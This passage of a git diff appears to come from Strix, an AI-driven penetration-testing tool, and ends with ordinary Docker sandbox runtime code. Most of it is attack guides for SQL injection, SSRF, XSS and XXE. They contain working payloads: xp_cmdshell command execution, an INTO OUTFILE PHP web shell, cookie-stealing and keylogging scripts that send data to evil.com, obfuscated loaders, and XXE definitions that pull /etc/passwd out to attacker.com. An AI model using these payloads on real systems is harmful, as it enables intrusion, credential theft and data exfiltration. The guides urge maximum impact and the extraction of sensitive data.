'; EXEC xp_cmdshell 'nslookup attacker.com'--
PostgreSQL:
'; CREATE EXTENSION dblink; SELECT dblink_connect('host=attacker.com')--
</out_of_band>
<file_operations>
MySQL:
' UNION SELECT 1,2,LOAD_FILE('/etc/passwd')--
' UNION SELECT 1,2,'<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'--
MSSQL:
'; EXEC xp_cmdshell 'type C:\Windows\win.ini'--
PostgreSQL:
'; CREATE TABLE test(data text); COPY test FROM '/etc/passwd'--
</file_operations>
</advanced_techniques>
<filter_bypasses>
<space_bypass>
- Comments: /**/
- Parentheses: UNION(SELECT)
- Backticks: UNION`SELECT`
- Newlines: %0A, %0D
- Tabs: %09
</space_bypass>
<keyword_bypass>
- Case variation: UnIoN SeLeCt
- Comments: UN/**/ION SE/**/LECT
- Encoding: %55nion %53elect
- Double words: UNUNIONION SESELECTLECT
</keyword_bypass>
<waf_bypasses>
- HTTP Parameter Pollution: id=1&id=' UNION SELECT
- JSON/XML format switching
- Chunked encoding
- Unicode normalization
- Scientific notation: 1e0 UNION SELECT
</waf_bypasses>
</filter_bypasses>
<specific_databases>
<mysql>
- Version: @@version
- Database: database()
- User: user(), current_user()
- Tables: information_schema.tables
- Columns: information_schema.columns
</mysql>
<mssql>
- Version: @@version
- Database: db_name()
- User: user_name(), system_user
- Tables: sysobjects WHERE xtype='U'
- Enable xp_cmdshell: sp_configure 'xp_cmdshell',1;RECONFIGURE
</mssql>
<postgresql>
- Version: version()
- Database: current_database()
- User: current_user
- Tables: pg_tables
- Command execution: CREATE EXTENSION
</postgresql>
<oracle>
- Version: SELECT banner FROM v$version
- Database: SELECT ora_database_name FROM dual
- User: SELECT user FROM dual
- Tables: all_tables
</oracle>
</specific_databases>
<nosql_injection>
<mongodb>
{"username": {"$ne": null}, "password": {"$ne": null}}
{"$where": "this.username == 'admin'"}
{"username": {"$regex": "^admin"}}
</mongodb>
<graphql>
{users(where:{OR:[{id:1},{id:2}]}){id,password}}
{__schema{types{name,fields{name}}}}
</graphql>
</nosql_injection>
<automation>
SQLMap flags:
- Risk/Level: --risk=3 --level=5
- Bypass WAF: --tamper=space2comment,between
- OS Shell: --os-shell
- Database dump: --dump-all
- Specific technique: --technique=T (time-based)
</automation>
<validation>
To confirm SQL injection:
1. Demonstrate database version extraction
2. Show database/table enumeration
3. Extract actual data
4. Prove query manipulation
5. Document consistent exploitation
</validation>
<false_positives>
NOT SQLi if:
- Only generic errors
- No time delays work
- Same response for all payloads
- Parameterized queries properly used
- Input validation effective
</false_positives>
<impact>
- Database content theft
- Authentication bypass
- Data manipulation
- Command execution (xp_cmdshell)
- File system access
- Complete database takeover
</impact>
<pro_tips>
1. Always try UNION SELECT first
2. Use sqlmap for automation
3. Test all HTTP headers
4. Try different encodings
5. Check for second-order SQLi
6. Test JSON/XML parameters
7. Look for error messages
8. Try time-based for blind
9. Check INSERT/UPDATE contexts
10. Focus on data extraction
</pro_tips>
<remember>Modern SQLi requires bypassing WAFs and dealing with complex queries. Focus on extracting sensitive data - passwords, API keys, PII. Time-based blind SQLi works when nothing else does.</remember>
</sql_injection_guide>

View File

@@ -0,0 +1,168 @@
<ssrf_vulnerability_guide>
<title>SERVER-SIDE REQUEST FORGERY (SSRF) - ADVANCED EXPLOITATION</title>
<critical>SSRF can lead to internal network access, cloud metadata theft, and complete infrastructure compromise.</critical>
<common_injection_points>
- URL parameters: url=, link=, path=, src=, href=, uri=
- File import/export features
- Webhooks and callbacks
- PDF generators (wkhtmltopdf)
- Image processing (ImageMagick)
- Document parsers
- Payment gateways (IPN callbacks)
- Social media card generators
- URL shorteners/expanders
</common_injection_points>
<hidden_contexts>
- Referer headers in analytics
- Link preview generation
- RSS/Feed fetchers
- Repository cloning (Git/SVN)
- Package managers (npm, pip)
- Calendar invites (ICS files)
- OAuth redirect_uri
- SAML endpoints
- GraphQL field resolvers
</hidden_contexts>
<cloud_metadata>
<aws>
Legacy: http://169.254.169.254/latest/meta-data/
IMDSv2: Requires token but check if app proxies headers
Key targets: /iam/security-credentials/, /user-data/
</aws>
<google_cloud>
http://metadata.google.internal/computeMetadata/v1/
Requires: Metadata-Flavor: Google header
Target: /instance/service-accounts/default/token
</google_cloud>
<azure>
http://169.254.169.254/metadata/instance?api-version=2021-02-01
Requires: Metadata: true header
OAuth: /metadata/identity/oauth2/token
</azure>
</cloud_metadata>
<internal_services>
<port_scanning>
Common ports: 21,22,80,443,445,1433,3306,3389,5432,6379,8080,9200,27017
</port_scanning>
<service_fingerprinting>
- Elasticsearch: http://localhost:9200/_cat/indices
- Redis: dict://localhost:6379/INFO
- MongoDB: http://localhost:27017/test
- Docker: http://localhost:2375/v1.24/containers/json
- Kubernetes: https://kubernetes.default.svc/api/v1/
</service_fingerprinting>
</internal_services>
<protocol_exploitation>
<gopher>
Redis RCE, SMTP injection, FastCGI exploitation
</gopher>
<file>
file:///etc/passwd, file:///proc/self/environ
</file>
<dict>
dict://localhost:11211/stat (Memcached)
</dict>
</protocol_exploitation>
<bypass_techniques>
<dns_rebinding>
First request → your server, second → 127.0.0.1
</dns_rebinding>
<encoding_tricks>
- Decimal IP: http://2130706433/ (127.0.0.1)
- Octal: http://0177.0.0.1/
- Hex: http://0x7f.0x0.0x0.0x1/
- IPv6: http://[::1]/, http://[::ffff:127.0.0.1]/
</encoding_tricks>
<url_parser_confusion>
- Authority: http://expected@evil/
- Unicode: http://⑯⑨。②⑤④。⑯⑨。②⑤④/
</url_parser_confusion>
<redirect_chains>
302 → yourserver.com → 169.254.169.254
</redirect_chains>
</bypass_techniques>
<advanced_techniques>
<blind_ssrf>
- DNS exfiltration: http://$(hostname).attacker.com/
- Timing attacks for network mapping
- Error-based detection
</blind_ssrf>
<ssrf_to_rce>
- Redis: gopher://localhost:6379/ (cron injection)
- Memcached: gopher://localhost:11211/
- FastCGI: gopher://localhost:9000/
</ssrf_to_rce>
</advanced_techniques>
<filter_bypasses>
<localhost>
127.1, 0177.0.0.1, 0x7f000001, 2130706433, 127.0.0.0/8, localtest.me
</localhost>
<parser_differentials>
http://evil.com#@good.com/, http:evil.com
</parser_differentials>
<protocols>
dict://, gopher://, ftp://, file://, jar://, netdoc://
</protocols>
</filter_bypasses>
<validation_techniques>
To confirm SSRF:
1. External callbacks (DNS/HTTP)
2. Internal network access (different responses)
3. Time-based detection (timeouts)
4. Cloud metadata retrieval
5. Protocol differentiation
</validation_techniques>
<false_positive_indicators>
NOT SSRF if:
- Only client-side redirects
- Whitelist properly blocking
- Generic errors for all URLs
- No outbound requests made
- Same-origin policy enforced
</false_positive_indicators>
<impact_demonstration>
- Cloud credential theft (AWS/GCP/Azure)
- Internal admin panel access
- Port scanning results
- SSRF to RCE chain
- Data exfiltration
</impact_demonstration>
<pro_tips>
1. Always check cloud metadata first
2. Chain with other vulns (SSRF + XXE)
3. Use time delays for blind SSRF
4. Try all protocols, not just HTTP
5. Automate internal network scanning
6. Check parser quirks (language-specific)
7. Monitor DNS for blind confirmation
8. Try IPv6 (often forgotten)
9. Abuse redirects for filter bypass
10. SSRF can be in any URL-fetching feature
</pro_tips>
<remember>SSRF is often the key to cloud compromise. A single SSRF in cloud = complete account takeover through metadata access.</remember>
</ssrf_vulnerability_guide>

View File

@@ -0,0 +1,221 @@
<xss_vulnerability_guide>
<title>CROSS-SITE SCRIPTING (XSS) - ADVANCED EXPLOITATION</title>
<critical>XSS leads to account takeover, data theft, and complete client-side compromise. Modern XSS requires sophisticated bypass techniques.</critical>
<injection_points>
- URL parameters: ?search=, ?q=, ?name=
- Form inputs: text, textarea, hidden fields
- Headers: User-Agent, Referer, X-Forwarded-For
- Cookies (if reflected)
- File uploads (filename, metadata)
- JSON endpoints: {"user":"<payload>"}
- postMessage handlers
- DOM properties: location.hash, document.referrer
- WebSocket messages
- PDF/document generators
</injection_points>
<basic_detection>
<reflection_testing>
Simple: <random123>
HTML: <h1>test</h1>
Script: <script>alert(1)</script>
Event: <img src=x onerror=alert(1)>
Protocol: javascript:alert(1)
</reflection_testing>
<encoding_contexts>
- HTML: <>&"'
- Attribute: "'<>&
- JavaScript: "'\/\n\r\t
- URL: %3C%3E%22%27
- CSS: ()'";{}
</encoding_contexts>
</basic_detection>
<filter_bypasses>
<tag_event_bypasses>
<svg onload=alert(1)>
<body onpageshow=alert(1)>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<audio src onloadstart=alert(1)>
<video><source onerror=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus>/*</textarea><svg/onload=alert(1)>
<keygen autofocus onfocus=alert(1)>
<frameset onload=alert(1)>
</tag_event_bypasses>
<string_bypass>
- Concatenation: 'al'+'ert'
- Comments: /**/alert/**/
- Template literals: `ale${`rt`}`
- Unicode: \u0061lert
- Hex: \x61lert
- Octal: \141lert
- HTML entities: &apos;alert&apos;
- Double encoding: %253Cscript%253E
- Case variation: <ScRiPt>
</string_bypass>
<parentheses_bypass>
alert`1`
setTimeout`alert\x281\x29`
[].map.call`1${alert}2`
onerror=alert;throw 1
onerror=alert,throw 1
onerror=alert(1)//
</parentheses_bypass>
<keyword_bypass>
- Proxy: window['al'+'ert']
- Base64: atob('YWxlcnQ=')
- Hex: eval('\x61\x6c\x65\x72\x74')
- Constructor: [].constructor.constructor('alert(1)')()
- JSFuck: [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]...
</keyword_bypass>
</filter_bypasses>
<advanced_techniques>
<dom_xss>
- Sinks: innerHTML, document.write, eval, setTimeout
- Sources: location.hash, location.search, document.referrer
- Example: element.innerHTML = location.hash
- Exploit: #<img src=x onerror=alert(1)>
</dom_xss>
<mutation_xss>
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<form><button formaction=javascript:alert(1)>
</mutation_xss>
<polyglot_xss>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
</polyglot_xss>
<csp_bypasses>
- JSONP endpoints: <script src="//site.com/jsonp?callback=alert">
- AngularJS: {{constructor.constructor('alert(1)')()}}
- Script gadgets in allowed libraries
- Base tag injection: <base href="//evil.com/">
- Object/embed: <object data="data:text/html,<script>alert(1)</script>">
</csp_bypasses>
</advanced_techniques>
<exploitation_payloads>
<cookie_theft>
<script>fetch('//evil.com/steal?c='+document.cookie)</script>
<img src=x onerror="this.src='//evil.com/steal?c='+document.cookie">
new Image().src='//evil.com/steal?c='+document.cookie
</cookie_theft>
<keylogger>
document.onkeypress=e=>fetch('//evil.com/key?k='+e.key)
</keylogger>
<phishing>
document.body.innerHTML='<form action=//evil.com/phish><input name=pass><input type=submit></form>'
</phishing>
<csrf_token_theft>
fetch('/api/user').then(r=>r.text()).then(d=>fetch('//evil.com/token?t='+d.match(/csrf_token":"([^"]+)/)[1]))
</csrf_token_theft>
<webcam_mic_access>
navigator.mediaDevices.getUserMedia({video:true}).then(s=>...)
</webcam_mic_access>
</exploitation_payloads>
<special_contexts>
<pdf_generation>
- JavaScript in links: <a href="javascript:app.alert(1)">
- Form actions: <form action="javascript:...">
</pdf_generation>
<email_clients>
- Limited tags: <a>, <img>, <style>
- CSS injection: <style>@import'//evil.com/css'</style>
</email_clients>
<markdown>
[Click](javascript:alert(1))
![a](x"onerror="alert(1))
</markdown>
<react_vue>
- dangerouslySetInnerHTML={{__html: payload}}
- v-html directive bypass
</react_vue>
<file_upload_xss>
- SVG: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
- HTML files
- XML with XSLT
- MIME type confusion
</file_upload_xss>
</special_contexts>
<blind_xss>
<detection>
- Out-of-band callbacks
- Service workers for persistence
- Polyglot payloads for multiple contexts
</detection>
<payloads>
'"><script src=//evil.com/blindxss.js></script>
'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8vZXZpbC5jb20veHNzLmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw onerror=eval(atob(this.id))>
</payloads>
</blind_xss>
<waf_bypasses>
<encoding>
- HTML: &#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;
- URL: %3Cscript%3E
- Unicode: \u003cscript\u003e
- Mixed: <scr\x69pt>
</encoding>
<obfuscation>
<a href="j&#x61;vascript:alert(1)">
<img src=x onerror="\u0061\u006C\u0065\u0072\u0074(1)">
<svg/onload=eval(atob('YWxlcnQoMSk='))>
</obfuscation>
<browser_bugs>
- Chrome: <svg><script>alert&lpar;1&rpar;
- Firefox specific payloads
- IE/Edge compatibility
</browser_bugs>
</waf_bypasses>
<impact_demonstration>
1. Account takeover via cookie/token theft
2. Defacement proof
3. Keylogging demonstration
4. Internal network scanning
5. Cryptocurrency miner injection
6. Phishing form injection
7. Browser exploit delivery
8. Session hijacking
9. CSRF attack chaining
10. Admin panel access
</impact_demonstration>
<pro_tips>
1. Test in all browsers - payloads vary
2. Check mobile versions - different parsers
3. Use automation for blind XSS
4. Chain with other vulnerabilities
5. Focus on impact, not just alert(1)
6. Test all input vectors systematically
7. Understand the context deeply
8. Keep payload library updated
9. Monitor CSP headers
10. Think beyond script tags
</pro_tips>
<remember>Modern XSS is about bypassing filters, CSP, and WAFs. Focus on real impact - steal sessions, phish credentials, or deliver exploits. Simple alert(1) is just the beginning.</remember>
</xss_vulnerability_guide>

View File

@@ -0,0 +1,276 @@
<xxe_vulnerability_guide>
<title>XML EXTERNAL ENTITY (XXE) - ADVANCED EXPLOITATION</title>
<critical>XXE leads to file disclosure, SSRF, RCE, and DoS. Often found in APIs, file uploads, and document parsers.</critical>
<discovery_points>
- XML file uploads (docx, xlsx, svg, xml)
- SOAP endpoints
- REST APIs accepting XML
- SAML implementations
- RSS/Atom feeds
- XML configuration files
- WebDAV
- Office document processors
- SVG image uploads
- PDF generators with XML input
</discovery_points>
<basic_payloads>
<file_disclosure>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<root>&xxe;</root>
</file_disclosure>
<ssrf_via_xxe>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
<root>&xxe;</root>
</ssrf_via_xxe>
<blind_xxe_oob>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>
evil.dtd:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
</blind_xxe_oob>
</basic_payloads>
<advanced_techniques>
<parameter_entities>
<!DOCTYPE foo [
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://evil.com/?d=%data;'>">
%param;
%exfil;
]>
</parameter_entities>
<error_based_xxe>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
]>
</error_based_xxe>
<xxe_in_attributes>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root attr="&xxe;"/>
</xxe_in_attributes>
</advanced_techniques>
<filter_bypasses>
<encoding_tricks>
- UTF-16: <?xml version="1.0" encoding="UTF-16"?>
- UTF-7: <?xml version="1.0" encoding="UTF-7"?>
- Base64 in CDATA: <![CDATA[base64_payload]]>
</encoding_tricks>
<protocol_variations>
- file:// → file:
- file:// → netdoc://
- http:// → https://
- Gopher: gopher://
- PHP wrappers: php://filter/convert.base64-encode/resource=/etc/passwd
</protocol_variations>
<doctype_variations>
<!doctype foo [
<!DoCtYpE foo [
<!DOCTYPE foo PUBLIC "Any" "http://evil.com/evil.dtd">
<!DOCTYPE foo SYSTEM "http://evil.com/evil.dtd">
</doctype_variations>
</filter_bypasses>
<specific_contexts>
<json_xxe>
{"name": "test", "content": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><x>&xxe;</x>"}
</json_xxe>
<soap_xxe>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
</soap:Body>
</soap:Envelope>
</soap_xxe>
<svg_xxe>
<svg xmlns="http://www.w3.org/2000/svg">
<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<text>&xxe;</text>
</svg>
</svg_xxe>
<docx_xlsx_xxe>
1. Unzip document
2. Edit document.xml or similar
3. Add XXE payload
4. Rezip and upload
</docx_xlsx_xxe>
</specific_contexts>
<blind_xxe_techniques>
<dns_exfiltration>
<!DOCTYPE foo [
<!ENTITY % data SYSTEM "file:///etc/hostname">
<!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://%data;.attacker.com/'>">
%param;
%exfil;
]>
</dns_exfiltration>
<ftp_exfiltration>
<!DOCTYPE foo [
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'ftp://attacker.com:2121/%data;'>">
%param;
%exfil;
]>
</ftp_exfiltration>
<php_wrappers>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root>&xxe;</root>
</php_wrappers>
</blind_xxe_techniques>
<xxe_to_rce>
<expect_module>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]>
<root>&xxe;</root>
</expect_module>
<file_upload_lfi>
1. Upload malicious PHP via XXE
2. Include via LFI or direct access
</file_upload_lfi>
<java_specific>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:file:///tmp/evil.jar!/evil.class">]>
</java_specific>
</xxe_to_rce>
<denial_of_service>
<billion_laughs>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>
</billion_laughs>
<external_dtd_dos>
<!DOCTYPE foo SYSTEM "http://slow-server.com/huge.dtd">
</external_dtd_dos>
</denial_of_service>
<modern_bypasses>
<xinclude>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>
</xinclude>
<xslt>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('file:///etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>
</xslt>
</modern_bypasses>
<parser_specific>
<java>
- Supports jar: protocol
- External DTDs by default
- Parameter entities work
</java>
<dotnet>
- Supports file:// by default
- DTD processing varies by version
</dotnet>
<php>
- libxml2 based
- expect:// protocol with expect module
- php:// wrappers
</php>
<python>
- Default parsers often vulnerable
- lxml safer than xml.etree
</python>
</parser_specific>
<validation_testing>
<detection>
1. Basic entity test: &xxe;
2. External DTD: http://attacker.com/test.dtd
3. Parameter entity: %xxe;
4. Time-based: DTD with slow server
5. DNS lookup: http://test.attacker.com/
</detection>
<false_positives>
- Entity declared but not processed
- DTD loaded but entities blocked
- Output encoding preventing exploitation
- Limited file access (chroot/sandbox)
</false_positives>
</validation_testing>
<impact_demonstration>
1. Read sensitive files (/etc/passwd, web.config)
2. Cloud metadata access (AWS keys)
3. Internal network scanning (SSRF)
4. Data exfiltration proof
5. DoS demonstration
6. RCE if possible
</impact_demonstration>
<automation>
# XXE Scanner
def test_xxe(url, param):
payloads = [
'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/"> %xxe;]><foo/>',
'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
]
for payload in payloads:
response = requests.post(url, data={param: payload})
if 'root:' in response.text or check_callback():
return f"XXE found with: {payload}"
</automation>
<pro_tips>
1. Try all protocols, not just file://
2. Use parameter entities for blind XXE
3. Chain with SSRF for cloud metadata
4. Test different encodings (UTF-16)
5. Don't forget JSON/SOAP contexts
6. XInclude when entities are blocked
7. Error messages reveal file paths
8. Monitor DNS for blind confirmation
9. Some parsers allow network access but not files
10. Modern frameworks disable XXE by default - check configs
</pro_tips>
<remember>XXE is about understanding parser behavior. Different parsers have different features and restrictions. Always test comprehensively and demonstrate maximum impact.</remember>
</xxe_vulnerability_guide>

19
strix/runtime/__init__.py Normal file
View File

@@ -0,0 +1,19 @@
import os
from .runtime import AbstractRuntime
def get_runtime() -> AbstractRuntime:
runtime_backend = os.getenv("STRIX_RUNTIME_BACKEND", "docker")
if runtime_backend == "docker":
from .docker_runtime import DockerRuntime
return DockerRuntime()
raise ValueError(
f"Unsupported runtime backend: {runtime_backend}. Only 'docker' is supported for now."
)
__all__ = ["AbstractRuntime", "get_runtime"]

View File

@@ -0,0 +1,271 @@
import logging
import os
import secrets
import socket
import time
from pathlib import Path
from typing import cast
import docker
from docker.errors import DockerException, NotFound
from docker.models.containers import Container
from .runtime import AbstractRuntime, SandboxInfo
STRIX_AGENT_LABEL = "StrixAgent_ID"
STRIX_SCAN_LABEL = "StrixScan_ID"
STRIX_IMAGE = os.getenv("STRIX_IMAGE", "ghcr.io/usestrix/strix-sandbox:0.1.4")
logger = logging.getLogger(__name__)
_initialized_volumes: set[str] = set()
class DockerRuntime(AbstractRuntime):
def __init__(self) -> None:
try:
self.client = docker.from_env()
except DockerException as e:
logger.exception("Failed to connect to Docker daemon")
raise RuntimeError("Docker is not available or not configured correctly.") from e
def _generate_sandbox_token(self) -> str:
return secrets.token_urlsafe(32)
def _get_scan_id(self, agent_id: str) -> str:
try:
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
if tracer and tracer.scan_config:
return str(tracer.scan_config.get("scan_id", "default-scan"))
except ImportError:
logger.debug("Failed to import tracer, using fallback scan ID")
except AttributeError:
logger.debug("Tracer missing scan_config, using fallback scan ID")
return f"scan-{agent_id.split('-')[0]}"
def _find_available_port(self) -> int:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind(("", 0))
return cast("int", s.getsockname()[1])
def _get_workspace_volume_name(self, scan_id: str) -> str:
return f"strix-workspace-{scan_id}"
def _get_sandbox_by_agent_id(self, agent_id: str) -> Container | None:
try:
containers = self.client.containers.list(
filters={"label": f"{STRIX_AGENT_LABEL}={agent_id}"}
)
if not containers:
return None
if len(containers) > 1:
logger.warning(
"Multiple sandboxes found for agent ID %s, using the first one.", agent_id
)
return cast("Container", containers[0])
except DockerException as e:
logger.warning("Failed to get sandbox by agent ID %s: %s", agent_id, e)
return None
def _ensure_workspace_volume(self, volume_name: str) -> None:
try:
self.client.volumes.get(volume_name)
logger.info(f"Using existing workspace volume: {volume_name}")
except NotFound:
self.client.volumes.create(name=volume_name, driver="local")
logger.info(f"Created new workspace volume: {volume_name}")
def _copy_local_directory_to_container(self, container: Container, local_path: str) -> None:
import tarfile
from io import BytesIO
try:
local_path_obj = Path(local_path).resolve()
if not local_path_obj.exists() or not local_path_obj.is_dir():
logger.warning(f"Local path does not exist or is not a directory: {local_path_obj}")
return
logger.info(f"Copying local directory {local_path_obj} to container {container.id}")
tar_buffer = BytesIO()
with tarfile.open(fileobj=tar_buffer, mode="w") as tar:
for item in local_path_obj.rglob("*"):
if item.is_file():
arcname = item.relative_to(local_path_obj)
tar.add(item, arcname=arcname)
tar_buffer.seek(0)
container.put_archive("/shared_workspace", tar_buffer.getvalue())
container.exec_run(
"chown -R pentester:pentester /shared_workspace && chmod -R 755 /shared_workspace",
user="root",
)
logger.info(
f"Successfully copied {local_path_obj} to /shared_workspace in container "
f"{container.id}"
)
except (OSError, DockerException):
logger.exception("Failed to copy local directory to container")
async def create_sandbox(
self, agent_id: str, existing_token: str | None = None, local_source_path: str | None = None
) -> SandboxInfo:
sandbox = self._get_sandbox_by_agent_id(agent_id)
auth_token = existing_token or self._generate_sandbox_token()
scan_id = self._get_scan_id(agent_id)
volume_name = self._get_workspace_volume_name(scan_id)
self._ensure_workspace_volume(volume_name)
if not sandbox:
logger.info("Creating new Docker sandbox for agent %s", agent_id)
try:
tool_server_port = self._find_available_port()
caido_port = self._find_available_port()
volumes_config = {volume_name: {"bind": "/shared_workspace", "mode": "rw"}}
container_name = f"strix-{agent_id}"
sandbox = self.client.containers.run(
STRIX_IMAGE,
command="sleep infinity",
detach=True,
name=container_name,
hostname=container_name,
ports={
f"{tool_server_port}/tcp": tool_server_port,
f"{caido_port}/tcp": caido_port,
},
cap_add=["NET_ADMIN", "NET_RAW"],
labels={
STRIX_AGENT_LABEL: agent_id,
STRIX_SCAN_LABEL: scan_id,
},
environment={
"PYTHONUNBUFFERED": "1",
"STRIX_AGENT_ID": agent_id,
"STRIX_SANDBOX_TOKEN": auth_token,
"STRIX_TOOL_SERVER_PORT": str(tool_server_port),
"CAIDO_PORT": str(caido_port),
},
volumes=volumes_config,
tty=True,
)
logger.info(
"Created new sandbox %s for agent %s with shared workspace %s",
sandbox.id,
agent_id,
volume_name,
)
except DockerException as e:
raise RuntimeError(f"Failed to create Docker sandbox: {e}") from e
assert sandbox is not None
if sandbox.status != "running":
sandbox.start()
time.sleep(15)
if local_source_path and volume_name not in _initialized_volumes:
self._copy_local_directory_to_container(sandbox, local_source_path)
_initialized_volumes.add(volume_name)
sandbox_id = sandbox.id
if sandbox_id is None:
raise RuntimeError("Docker container ID is unexpectedly None")
tool_server_port_str = sandbox.attrs["Config"]["Env"][
next(
(
i
for i, s in enumerate(sandbox.attrs["Config"]["Env"])
if s.startswith("STRIX_TOOL_SERVER_PORT=")
),
-1,
)
].split("=")[1]
tool_server_port = int(tool_server_port_str)
api_url = await self.get_sandbox_url(sandbox_id, tool_server_port)
return {
"workspace_id": sandbox_id,
"api_url": api_url,
"auth_token": auth_token,
"tool_server_port": tool_server_port,
}
async def get_sandbox_url(self, sandbox_id: str, port: int) -> str:
try:
container = self.client.containers.get(sandbox_id)
container.reload()
host = "localhost"
if "DOCKER_HOST" in os.environ:
docker_host = os.environ["DOCKER_HOST"]
if "://" in docker_host:
host = docker_host.split("://")[1].split(":")[0]
except NotFound:
raise ValueError(f"Sandbox {sandbox_id} not found.") from None
except DockerException as e:
raise RuntimeError(f"Failed to get sandbox URL for {sandbox_id}: {e}") from e
else:
return f"http://{host}:{port}"
async def destroy_sandbox(self, sandbox_id: str) -> None:
logger.info("Destroying Docker sandbox %s", sandbox_id)
try:
container = self.client.containers.get(sandbox_id)
scan_id = None
if container.labels and STRIX_SCAN_LABEL in container.labels:
scan_id = container.labels[STRIX_SCAN_LABEL]
container.stop()
container.remove()
logger.info("Successfully destroyed sandbox %s", sandbox_id)
if scan_id:
await self._cleanup_workspace_if_empty(scan_id)
except NotFound:
logger.warning("Sandbox %s not found for destruction.", sandbox_id)
except DockerException as e:
logger.warning("Failed to destroy sandbox %s: %s", sandbox_id, e)
async def _cleanup_workspace_if_empty(self, scan_id: str) -> None:
try:
volume_name = self._get_workspace_volume_name(scan_id)
containers = self.client.containers.list(
all=True, filters={"label": f"{STRIX_SCAN_LABEL}={scan_id}"}
)
if not containers:
try:
volume = self.client.volumes.get(volume_name)
volume.remove()
logger.info(
f"Cleaned up workspace volume {volume_name} for completed scan {scan_id}"
)
_initialized_volumes.discard(volume_name)
except NotFound:
logger.debug(f"Volume {volume_name} already removed")
except DockerException as e:
logger.warning(f"Failed to remove volume {volume_name}: {e}")
except DockerException as e:
logger.warning("Error during workspace cleanup for scan %s: %s", scan_id, e)
async def cleanup_scan_workspace(self, scan_id: str) -> None:
await self._cleanup_workspace_if_empty(scan_id)

25
strix/runtime/runtime.py Normal file
View File

@@ -0,0 +1,25 @@
from abc import ABC, abstractmethod
from typing import TypedDict
class SandboxInfo(TypedDict):
workspace_id: str
api_url: str
auth_token: str | None
tool_server_port: int
class AbstractRuntime(ABC):
@abstractmethod
async def create_sandbox(
self, agent_id: str, existing_token: str | None = None, local_source_path: str | None = None
) -> SandboxInfo:
raise NotImplementedError
@abstractmethod
async def get_sandbox_url(self, sandbox_id: str, port: int) -> str:
raise NotImplementedError
@abstractmethod
async def destroy_sandbox(self, sandbox_id: str) -> None:
raise NotImplementedError

View File

@@ -0,0 +1,97 @@
import logging
import os
from typing import Any
from fastapi import Depends, FastAPI, HTTPException, status
from fastapi.security import HTTPAuthorizationCredentials, HTTPBearer
from pydantic import BaseModel, ValidationError
SANDBOX_MODE = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
if not SANDBOX_MODE:
raise RuntimeError("Tool server should only run in sandbox mode (STRIX_SANDBOX_MODE=true)")
EXPECTED_TOKEN = os.getenv("STRIX_SANDBOX_TOKEN")
if not EXPECTED_TOKEN:
raise RuntimeError("STRIX_SANDBOX_TOKEN environment variable is required in sandbox mode")
app = FastAPI()
logger = logging.getLogger(__name__)
security = HTTPBearer()
security_dependency = Depends(security)
def verify_token(credentials: HTTPAuthorizationCredentials) -> str:
if not credentials or credentials.scheme != "Bearer":
logger.warning("Authentication failed: Invalid or missing Bearer token scheme")
raise HTTPException(
